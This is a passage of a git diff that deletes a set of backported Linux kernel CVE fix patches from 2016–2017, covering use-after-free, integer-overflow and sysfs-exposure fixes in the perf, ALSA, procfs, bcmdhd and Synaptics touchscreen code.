-- if (len < (USB_DT_CONFIG_SIZE + USB_DT_DEVICE_SIZE + 4))
-+ if ((len < (USB_DT_CONFIG_SIZE + USB_DT_DEVICE_SIZE + 4)) ||
-+ (len > PAGE_SIZE * 4))
- return -EINVAL;
-
- /* we might need to change message format someday */
diff --git a/Patches/Linux_CVEs/CVE-2017-0403/3.0-^3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0403/3.0-^3.18/0001.patch
deleted file mode 100644
index 6de691a0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0403/3.0-^3.18/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 2c5c1fd0d2a2a96fab750fa332cb703022c16c04 Mon Sep 17 00:00:00 2001
-From: John Dias
-Date: Wed, 9 Nov 2016 11:03:57 -0800
-Subject: [PATCH] perf: don't leave group_entry on sibling list
- (use-after-free)
-
-When perf_group_detach is called on a group leader,
-it should empty its sibling list. Otherwise, when
-a sibling is later deallocated, list_del_event()
-removes the sibling's group_entry from its current
-list, which can be the now-deallocated group leader's
-sibling list (use-after-free bug).
-
-Bug: 32402548
-Change-Id: I99f6bc97c8518df1cb0035814368012ba72ab1f1
-Signed-off-by: John Dias
----
- kernel/events/core.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/kernel/events/core.c b/kernel/events/core.c
-index 01eab13ec0e7e..b7e1e224f07e9 100644
---- a/kernel/events/core.c
-+++ b/kernel/events/core.c
-@@ -1449,10 +1449,17 @@ static void perf_group_detach(struct perf_event *event)
- * If this was a group event with sibling events then
- * upgrade the siblings to singleton events by adding them
- * to whatever list we are on.
-+ * If this isn't on a list, make sure we still remove the sibling's
-+ * group_entry from this sibling_list; otherwise, when that sibling
-+ * is later deallocated, it will try to remove itself from this
-+ * sibling_list, which may well have been deallocated already,
-+ * resulting in a use-after-free.
- */
- list_for_each_entry_safe(sibling, tmp, &event->sibling_list, group_entry) {
- if (list)
- list_move_tail(&sibling->group_entry, list);
-+ else
-+ list_del_init(&sibling->group_entry);
- sibling->group_leader = sibling;
-
- /* Inherit group flags from the previous leader */
diff --git a/Patches/Linux_CVEs/CVE-2017-0404/^3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0404/^3.18/0001.patch
deleted file mode 100644
index 3b802d6e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0404/^3.18/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 4faa6d2e9b53546823882d8889820ff9ce3c372f Mon Sep 17 00:00:00 2001
-From: Siqi Lin
-Date: Wed, 2 Nov 2016 16:51:08 -0700
-Subject: [PATCH] ALSA: info: Check for integer overflow in
- snd_info_entry_write()
-
-snd_info_entry_write() resizes the buffer with an unsigned long
-size argument that gets truncated because resize_info_buffer()
-takes the size parameter as an unsigned int. On 64-bit kernels,
-this causes the following copy_to_user() to write out-of-bounds
-if (pos + count) can't be represented by an unsigned int.
-
-Bug: 32510733
-Change-Id: I9e8b55f93f2bd606b4a73b5a4525b71ee88c7c23
-Signed-off-by: Siqi Lin
----
- sound/core/info.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/sound/core/info.c b/sound/core/info.c
-index 418b4ec43cadb..a4af0ba92d30f 100644
---- a/sound/core/info.c
-+++ b/sound/core/info.c
-@@ -253,6 +253,7 @@ static ssize_t snd_info_entry_write(struct file *file, const char __user *buffer
- struct snd_info_buffer *buf;
- ssize_t size = 0;
- loff_t pos;
-+ unsigned long realloc_size;
-
- data = file->private_data;
- if (snd_BUG_ON(!data))
-@@ -261,7 +262,8 @@ static ssize_t snd_info_entry_write(struct file *file, const char __user *buffer
- pos = *offset;
- if (pos < 0 || (long) pos != pos || (ssize_t) count < 0)
- return -EIO;
-- if ((unsigned long) pos + (unsigned long) count < (unsigned long) pos)
-+ realloc_size = (unsigned long) pos + (unsigned long) count;
-+ if (realloc_size < (unsigned long) pos || realloc_size > UINT_MAX)
- return -EIO;
- switch (entry->content) {
- case SNDRV_INFO_CONTENT_TEXT:
diff --git a/Patches/Linux_CVEs/CVE-2017-0427/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0427/3.10/0001.patch
deleted file mode 100644
index 8e686e81..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0427/3.10/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 5db4167c9924c68ab9554bba3a98ecfd14b91a8e Mon Sep 17 00:00:00 2001
-From: Adrian Salido
-Date: Thu, 1 Dec 2016 18:07:42 -0800
-Subject: [PATCH] fs/proc/array.c: make safe access to group_leader
-
-As mentioned in commit 52ee2dfdd4f51cf422ea6a96a0846dc94244aa37
-("pids: refactor vnr/nr_ns helpers to make them safe"). *_nr_ns
-helpers used to be buggy. The commit addresses most of the helpers but
-is missing task_tgid_xxx()
-
-Without this protection there is a possible use after free reported by
-kasan instrumented kernel:
-
-==================================================================
-BUG: KASAN: use-after-free in task_tgid_nr_ns+0x2c/0x44 at addr ***
-Read of size 8 by task cat/2472
-CPU: 1 PID: 2472 Comm: cat Tainted: ****
-Hardware name: Google Tegra210 Smaug Rev 1,3+ (DT)
-Call trace:
-[] dump_backtrace+0x0/0x17c
-[] show_stack+0x18/0x24
-[] dump_stack+0x94/0x100
-[] kasan_report+0x308/0x554
-[] __asan_load8+0x20/0x7c
-[] task_tgid_nr_ns+0x28/0x44
-[] proc_pid_status+0x444/0x1080
-[] proc_single_show+0x8c/0xdc
-[] seq_read+0x2e8/0x6f0
-[] vfs_read+0xd8/0x1e0
-[] SyS_read+0x68/0xd4
-
-Accessing group_leader while holding rcu_lock and using the now safe
-helpers introduced in the commit mentioned, this race condition is
-addressed.
-
-Signed-off-by: Adrian Salido
-Change-Id: I4315217922dda375a30a3581c0c1740dda7b531b
-Bug: 31495866
----
- fs/proc/array.c | 10 +++++-----
- 1 file changed, 5 insertions(+), 5 deletions(-)
-
-diff --git a/fs/proc/array.c b/fs/proc/array.c
-index 09f0d9c374a32..6ed95802239df 100644
---- a/fs/proc/array.c
-+++ b/fs/proc/array.c
-@@ -168,16 +168,16 @@ static inline void task_state(struct seq_file *m, struct pid_namespace *ns,
- int g;
- struct fdtable *fdt = NULL;
- const struct cred *cred;
-- pid_t ppid, tpid;
-+ pid_t ppid = 0, tpid = 0;
-+ struct task_struct *leader = NULL;
-
- rcu_read_lock();
-- ppid = pid_alive(p) ?
-- task_tgid_nr_ns(rcu_dereference(p->real_parent), ns) : 0;
-- tpid = 0;
- if (pid_alive(p)) {
- struct task_struct *tracer = ptrace_parent(p);
- if (tracer)
- tpid = task_pid_nr_ns(tracer, ns);
-+ ppid = task_tgid_nr_ns(rcu_dereference(p->real_parent), ns);
-+ leader = p->group_leader;
- }
- cred = get_task_cred(p);
- seq_printf(m,
-@@ -189,7 +189,7 @@ static inline void task_state(struct seq_file *m, struct pid_namespace *ns,
- "Uid:\t%d\t%d\t%d\t%d\n"
- "Gid:\t%d\t%d\t%d\t%d\n",
- get_task_state(p),
-- task_tgid_nr_ns(p, ns),
-+ leader ? task_pid_nr_ns(leader, ns) : 0,
- pid_nr_ns(pid, ns),
- ppid, tpid,
- from_kuid_munged(user_ns, cred->uid),
diff --git a/Patches/Linux_CVEs/CVE-2017-0427/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-0427/3.18/0002.patch
deleted file mode 100644
index f54f373a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0427/3.18/0002.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 1d6d364ee174676a225a77dc7ca8dac887199718 Mon Sep 17 00:00:00 2001
-From: Adrian Salido
-Date: Thu, 1 Dec 2016 18:07:42 -0800
-Subject: [PATCH] fs/proc/array.c: make safe access to group_leader
-
-As mentioned in commit 52ee2dfdd4f51cf422ea6a96a0846dc94244aa37
-("pids: refactor vnr/nr_ns helpers to make them safe"). *_nr_ns
-helpers used to be buggy. The commit addresses most of the helpers but
-is missing task_tgid_xxx()
-
-Without this protection there is a possible use after free reported by
-kasan instrumented kernel:
-
-==================================================================
-BUG: KASAN: use-after-free in task_tgid_nr_ns+0x2c/0x44 at addr ***
-Read of size 8 by task cat/2472
-CPU: 1 PID: 2472 Comm: cat Tainted: ****
-Hardware name: Google Tegra210 Smaug Rev 1,3+ (DT)
-Call trace:
-[] dump_backtrace+0x0/0x17c
-[] show_stack+0x18/0x24
-[] dump_stack+0x94/0x100
-[] kasan_report+0x308/0x554
-[] __asan_load8+0x20/0x7c
-[] task_tgid_nr_ns+0x28/0x44
-[] proc_pid_status+0x444/0x1080
-[] proc_single_show+0x8c/0xdc
-[] seq_read+0x2e8/0x6f0
-[] vfs_read+0xd8/0x1e0
-[] SyS_read+0x68/0xd4
-
-Accessing group_leader while holding rcu_lock and using the now safe
-helpers introduced in the commit mentioned, this race condition is
-addressed.
-
-Signed-off-by: Adrian Salido
-Change-Id: I4315217922dda375a30a3581c0c1740dda7b531b
-Bug: 31495866
----
- fs/proc/array.c | 10 +++++-----
- 1 file changed, 5 insertions(+), 5 deletions(-)
-
-diff --git a/fs/proc/array.c b/fs/proc/array.c
-index 864f2e52cf1bc..6307f8774a11d 100644
---- a/fs/proc/array.c
-+++ b/fs/proc/array.c
-@@ -159,16 +159,16 @@ static inline void task_state(struct seq_file *m, struct pid_namespace *ns,
- int g;
- struct fdtable *fdt = NULL;
- const struct cred *cred;
-- pid_t ppid, tpid;
-+ pid_t ppid = 0, tpid = 0;
-+ struct task_struct *leader = NULL;
-
- rcu_read_lock();
-- ppid = pid_alive(p) ?
-- task_tgid_nr_ns(rcu_dereference(p->real_parent), ns) : 0;
-- tpid = 0;
- if (pid_alive(p)) {
- struct task_struct *tracer = ptrace_parent(p);
- if (tracer)
- tpid = task_pid_nr_ns(tracer, ns);
-+ ppid = task_tgid_nr_ns(rcu_dereference(p->real_parent), ns);
-+ leader = p->group_leader;
- }
- cred = get_task_cred(p);
- seq_printf(m,
-@@ -181,7 +181,7 @@ static inline void task_state(struct seq_file *m, struct pid_namespace *ns,
- "Gid:\t%d\t%d\t%d\t%d\n"
- "Ngid:\t%d\n",
- get_task_state(p),
-- task_tgid_nr_ns(p, ns),
-+ leader ? task_pid_nr_ns(leader, ns) : 0,
- pid_nr_ns(pid, ns),
- ppid, tpid,
- from_kuid_munged(user_ns, cred->uid),
diff --git a/Patches/Linux_CVEs/CVE-2017-0430/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0430/ANY/0001.patch
deleted file mode 100644
index 0e8a3d80..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0430/ANY/0001.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 709105c301aa53fb86c46b36f882998558b19652 Mon Sep 17 00:00:00 2001
-From: Greg Hackmann
-Date: Tue, 15 Nov 2016 15:17:24 -0800
-Subject: [PATCH] net: wireless: bcmdhd: fix use-after-free in
- _dhd_pno_get_for_batch()
-
-Bug: 32838767
-Change-Id: I987b07c30b3ed76865a002e7c154a5fa36b1bf29
-Signed-off-by: Greg Hackmann
----
- drivers/net/wireless/bcmdhd/dhd_pno.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index 3e4c6d8191f47..93642ed12bc04 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -3069,9 +3069,10 @@ _dhd_pno_get_for_batch(dhd_pub_t *dhd, char *buf, int bufsize, int reason)
- list_del(&pscan_results->list);
- MFREE(dhd->osh, pscan_results, SCAN_RESULTS_SIZE);
- _params->params_batch.get_batch.top_node_cnt--;
-+ } else {
-+ /* increase total scan count using current scan count */
-+ _params->params_batch.get_batch.tot_scan_cnt += pscan_results->cnt_header;
- }
-- /* increase total scan count using current scan count */
-- _params->params_batch.get_batch.tot_scan_cnt += pscan_results->cnt_header;
-
- if (buf && bufsize) {
- /* This is a first try to get batching results */
diff --git a/Patches/Linux_CVEs/CVE-2017-0433/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0433/ANY/0001.patch
deleted file mode 100644
index ed4d450e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0433/ANY/0001.patch
+++ /dev/null
@@ -1,181 +0,0 @@
-From fe160e51f02ee5db529c2e84ac8364c89cce005e Mon Sep 17 00:00:00 2001
-From: Andrew Chant
-Date: Tue, 6 Dec 2016 20:59:01 -0800
-Subject: [PATCH] input: synaptics_dsx: remove some sysfs nodes.
-
-Remove most sysfs entrypoints to fw_update module.
-Retains check_fw, which is triggered from an
-init script.
-
-BUG: 32769717
-Change-Id: I710cb37a8b5382dce7aa6a1d8748be5853a18a7a
-Signed-off-by: Andrew Chant
----
- drivers/input/touchscreen/Kconfig | 10 ++++++++++
- drivers/input/touchscreen/synaptics_fw_update.c | 20 ++++++++++++++++++++
- 2 files changed, 30 insertions(+)
-
-diff --git a/drivers/input/touchscreen/Kconfig b/drivers/input/touchscreen/Kconfig
-index a42fea5862af2..64266998c2290 100644
---- a/drivers/input/touchscreen/Kconfig
-+++ b/drivers/input/touchscreen/Kconfig
-@@ -1019,6 +1019,16 @@ config TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE
- To compile this driver as a module, choose M here: the
- module will be called synaptics_dsx_fw_update.
-
-+config TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
-+ bool "Synaptics DSX firmware update extra sysfs attributes"
-+ depends on TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE
-+ help
-+ Say Y here to enable support for extra sysfs attributes
-+ supporting firmware update in a development environment.
-+ This does not affect the core or other subsystem attributes.
-+
-+ If unsure, say N.
-+
- config SECURE_TOUCH
- bool "Secure Touch"
- depends on (TOUCHSCREEN_ATMEL_MXT || TOUCHSCREEN_SYNAPTICS_I2C_RMI4 || \
-diff --git a/drivers/input/touchscreen/synaptics_fw_update.c b/drivers/input/touchscreen/synaptics_fw_update.c
-index 8891f1c836684..360e455a5a51b 100644
---- a/drivers/input/touchscreen/synaptics_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_fw_update.c
-@@ -1331,6 +1331,7 @@ static int fwu_do_write_config(void)
- return retval;
- }
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- static int fwu_start_write_config(void)
- {
- int retval;
-@@ -1383,6 +1384,7 @@ static int fwu_start_write_config(void)
-
- return retval;
- }
-+#endif
-
- static int fwu_do_write_lockdown(bool reset)
- {
-@@ -1430,6 +1432,7 @@ static int fwu_do_write_lockdown(bool reset)
- return retval;
- }
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- static int fwu_start_write_lockdown(void)
- {
- if (parse_header())
-@@ -1533,6 +1536,7 @@ static int fwu_do_read_config(void)
- exit:
- return retval;
- }
-+#endif
-
- static int fwu_do_reflash(void)
- {
-@@ -1767,6 +1771,7 @@ int synaptics_fw_updater(void)
- }
- EXPORT_SYMBOL(synaptics_fw_updater);
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- static ssize_t fwu_sysfs_show_image(struct file *data_file,
- struct kobject *kobj, struct bin_attribute *attributes,
- char *buf, loff_t pos, size_t count)
-@@ -2021,6 +2026,7 @@ static ssize_t fwu_sysfs_write_lockdown_store(struct device *dev,
- mutex_unlock(&fwu_sysfs_mutex);
- return retval;
- }
-+#endif
-
- static ssize_t fwu_sysfs_check_fw_store(struct device *dev,
- struct device_attribute *attr, const char *buf, size_t count)
-@@ -2044,6 +2050,7 @@ static ssize_t fwu_sysfs_check_fw_store(struct device *dev,
- return count;
- }
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- static ssize_t fwu_sysfs_write_config_store(struct device *dev,
- struct device_attribute *attr, const char *buf, size_t count)
- {
-@@ -2265,6 +2272,7 @@ static ssize_t fwu_sysfs_package_id_show(struct device *dev,
- (pkg_id[1] << 8) | pkg_id[0],
- (pkg_id[3] << 8) | pkg_id[2]);
- }
-+#endif
-
- static int synaptics_rmi4_debug_dump_info(struct seq_file *m, void *v)
- {
-@@ -2298,6 +2306,7 @@ static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data,
- return;
- }
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- static struct bin_attribute dev_attr_data = {
- .attr = {
- .name = "data",
-@@ -2307,8 +2316,10 @@ static struct bin_attribute dev_attr_data = {
- .read = fwu_sysfs_show_image,
- .write = fwu_sysfs_store_image,
- };
-+#endif
-
- static struct device_attribute attrs[] = {
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- __ATTR(fw_name, S_IRUGO | S_IWUSR | S_IWGRP,
- fwu_sysfs_image_name_show,
- fwu_sysfs_image_name_store),
-@@ -2318,9 +2329,11 @@ static struct device_attribute attrs[] = {
- __ATTR(update_fw, S_IWUSR | S_IWGRP,
- NULL,
- fwu_sysfs_do_reflash_store),
-+#endif
- __ATTR(check_fw, S_IWUSR | S_IWGRP,
- NULL,
- fwu_sysfs_check_fw_store),
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- __ATTR(writeconfig, S_IWUSR | S_IWGRP,
- NULL,
- fwu_sysfs_write_config_store),
-@@ -2360,6 +2373,7 @@ static struct device_attribute attrs[] = {
- __ATTR(package_id, S_IRUGO,
- fwu_sysfs_package_id_show,
- synaptics_rmi4_store_error),
-+#endif
- };
-
-
-@@ -2470,6 +2484,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- INIT_DELAYED_WORK(&fwu->fwu_work, synaptics_rmi4_fwu_work);
- #endif
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj,
- &dev_attr_data);
- if (retval < 0) {
-@@ -2478,6 +2493,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- __func__);
- goto exit_free_mem;
- }
-+#endif
-
- for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) {
- retval = sysfs_create_file(&rmi4_data->i2c_client->dev.kobj,
-@@ -2511,7 +2527,9 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- &attrs[attr_count].attr);
- }
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data);
-+#endif
-
- exit_free_mem:
- kfree(fwu->fn_ptr);
-@@ -2528,7 +2546,9 @@ static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data)
- {
- unsigned char attr_count;
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data);
-+#endif
-
- for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) {
- sysfs_remove_file(&rmi4_data->input_dev->dev.kobj,
diff --git a/Patches/Linux_CVEs/CVE-2017-0433/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-0433/ANY/0002.patch
deleted file mode 100644
index c2e986ef..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0433/ANY/0002.patch
+++ /dev/null
@@ -1,210 +0,0 @@
-From 2615c5f302441568e6dd20007bc5246d72837e80 Mon Sep 17 00:00:00 2001
-From: Andrew Chant
-Date: Tue, 6 Dec 2016 19:19:26 -0800
-Subject: [PATCH] input: synaptics_dsx: remove update sysfs entries
-
-Remove sysfs entrypoints to fw_update module.
-
-BUG: 32769717
-Change-Id: I425761af84ed5c31cc5902b4f49c4981a49f3af0
-Signed-off-by: Andrew Chant
----
- drivers/input/touchscreen/synaptics_dsx25/Kconfig | 10 ++++++++
- .../synaptics_dsx25/synaptics_dsx_fw_update.c | 27 ++++++++++++++++++++--
- 2 files changed, 35 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx25/Kconfig b/drivers/input/touchscreen/synaptics_dsx25/Kconfig
-index 36661fc9d6a2d..218a6c3c96467 100644
---- a/drivers/input/touchscreen/synaptics_dsx25/Kconfig
-+++ b/drivers/input/touchscreen/synaptics_dsx25/Kconfig
-@@ -59,6 +59,16 @@ config TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE
- To compile this driver as a module, choose M here: the
- module will be called synaptics_dsx_fw_update.
-
-+config TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
-+ bool "Synaptics DSX firmware update sysfs attributes"
-+ depends on TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE
-+ help
-+ Say Y here to enable support for sysfs attributes for
-+ performing firmware update in a development environment.
-+ This does not affect the core or other subsystem attributes.
-+
-+ If unsure, say N.
-+
- config TOUCHSCREEN_SYNAPTICS_DSX25_ACTIVE_PEN
- tristate "Synaptics DSX active pen module"
- depends on TOUCHSCREEN_SYNAPTICS25_DSX_CORE
-diff --git a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-index 323f65891b458..8cad4d3b3a9d9 100755
---- a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-@@ -105,6 +105,7 @@ static int fwu_do_reflash(void);
-
- static int fwu_recovery_check_status(void);
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static ssize_t fwu_sysfs_show_image(struct file *data_file,
- struct kobject *kobj, struct bin_attribute *attributes,
- char *buf, loff_t pos, size_t count);
-@@ -157,6 +158,7 @@ static ssize_t fwu_sysfs_guest_code_block_count_show(struct device *dev,
-
- static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev,
- struct device_attribute *attr, const char *buf, size_t count);
-+#endif
-
- enum f34_version {
- F34_V0 = 0,
-@@ -595,6 +597,7 @@ struct synaptics_rmi4_fwu_handle {
- struct work_struct fwu_work;
- };
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static struct bin_attribute dev_attr_data = {
- .attr = {
- .name = "data",
-@@ -652,12 +655,14 @@ static struct device_attribute attrs[] = {
- synaptics_rmi4_show_error,
- fwu_sysfs_write_guest_code_store),
- };
-+#endif
-
- static struct synaptics_rmi4_fwu_handle *fwu;
-
- DECLARE_COMPLETION(dsx_fwu_remove_complete);
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- DEFINE_MUTEX(fwu_sysfs_mutex);
--
-+#endif
- static bool tp_2k_panel = false;
- /**
- * early_param: Parse system early startup parameters.
-@@ -3057,6 +3062,7 @@ static int fwu_do_reflash(void)
- return retval;
- }
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static int fwu_do_read_config(void)
- {
- int retval;
-@@ -3136,6 +3142,7 @@ static int fwu_do_read_config(void)
-
- return retval;
- }
-+#endif
-
- static int fwu_do_lockdown(void)
- {
-@@ -3173,6 +3180,7 @@ static int fwu_do_lockdown(void)
- return retval;
- }
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static int fwu_start_write_guest_code(void)
- {
- int retval;
-@@ -3348,6 +3356,7 @@ static int fwu_start_write_config(void)
-
- return retval;
- }
-+#endif
-
- static void synaptics_refresh_configid(void)
- {
-@@ -3584,6 +3593,7 @@ static int fwu_recovery_check_status(void)
- return 0;
- }
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static int fwu_recovery_erase_all(void)
- {
- int retval;
-@@ -3778,6 +3788,7 @@ static int fwu_start_recovery(void)
-
- return retval;
- }
-+#endif
-
- int synaptics_dsx25_fw_updater(const unsigned char *fw_data)
- {
-@@ -3838,6 +3849,7 @@ static void fwu_startup_fw_update_work(struct work_struct *work)
- }
- #endif
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static ssize_t fwu_sysfs_show_image(struct file *data_file,
- struct kobject *kobj, struct bin_attribute *attributes,
- char *buf, loff_t pos, size_t count)
-@@ -4236,6 +4248,7 @@ static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev,
- mutex_unlock(&fwu_sysfs_mutex);
- return retval;
- }
-+#endif
-
- static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data,
- unsigned char intr_mask)
-@@ -4252,7 +4265,9 @@ static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data,
- static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- {
- int retval;
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- unsigned char attr_count;
-+#endif
- struct pdt_properties pdt_props;
-
- if (fwu) {
-@@ -4319,6 +4334,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- &fwu->fwu_work);
- #endif
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- retval = sysfs_create_bin_file(&rmi4_data->input_dev->dev.kobj,
- &dev_attr_data);
- if (retval < 0) {
-@@ -4339,9 +4355,11 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- goto exit_remove_attrs;
- }
- }
-+#endif
-
- return 0;
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- exit_remove_attrs:
- for (attr_count--; attr_count >= 0; attr_count--) {
- sysfs_remove_file(&rmi4_data->input_dev->dev.kobj,
-@@ -4349,8 +4367,9 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- }
-
- sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data);
--
- exit_destroy_work:
-+#endif
-+
- #ifdef DO_STARTUP_FW_UPDATE
- cancel_work_sync(&fwu->fwu_work);
- flush_workqueue(fwu->fwu_workqueue);
-@@ -4370,7 +4389,9 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
-
- static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data)
- {
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- unsigned char attr_count;
-+#endif
-
- if (!fwu)
- goto exit;
-@@ -4381,12 +4402,14 @@ static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data)
- destroy_workqueue(fwu->fwu_workqueue);
- #endif
-
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) {
- sysfs_remove_file(&rmi4_data->input_dev->dev.kobj,
- &attrs[attr_count].attr);
- }
-
- sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data);
-+#endif
-
- kfree(fwu->read_config_buf);
- kfree(fwu->image_name);
diff --git a/Patches/Linux_CVEs/CVE-2017-0434/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0434/3.18/0001.patch
deleted file mode 100644
index 72cf9708..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0434/3.18/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From d740e7228bd1578ed01762998b2a86e7df56e608 Mon Sep 17 00:00:00 2001
-From: Andrew Chant
-Date: Fri, 2 Dec 2016 20:49:26 -0800
-Subject: [PATCH] input: synaptics_dsx: reallocate buffer under lock.
-
-Prevent concurrent usage & re-allocation of the wr_buf variable.
-Based off patch by chengengjia .
-
-BUG: 33001936
-Change-Id: I88d78e1ec0fc9e88b1e6824c06161b67d01136ec
-Signed-off-by: Andrew Chant
----
- drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_i2c.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_i2c.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_i2c.c
-index 5312f86a93470..3acd4d54bb6d5 100644
---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_i2c.c
-+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_i2c.c
-@@ -557,11 +557,11 @@ static int synaptics_rmi4_i2c_write(struct synaptics_rmi4_data *rmi4_data,
- struct i2c_client *i2c = to_i2c_client(rmi4_data->pdev->dev.parent);
- struct i2c_msg msg[1];
-
-+ mutex_lock(&rmi4_data->rmi4_io_ctrl_mutex);
-+
- retval = synaptics_rmi4_i2c_alloc_buf(rmi4_data, length + 1);
- if (retval < 0)
-- return retval;
--
-- mutex_lock(&rmi4_data->rmi4_io_ctrl_mutex);
-+ goto exit;
-
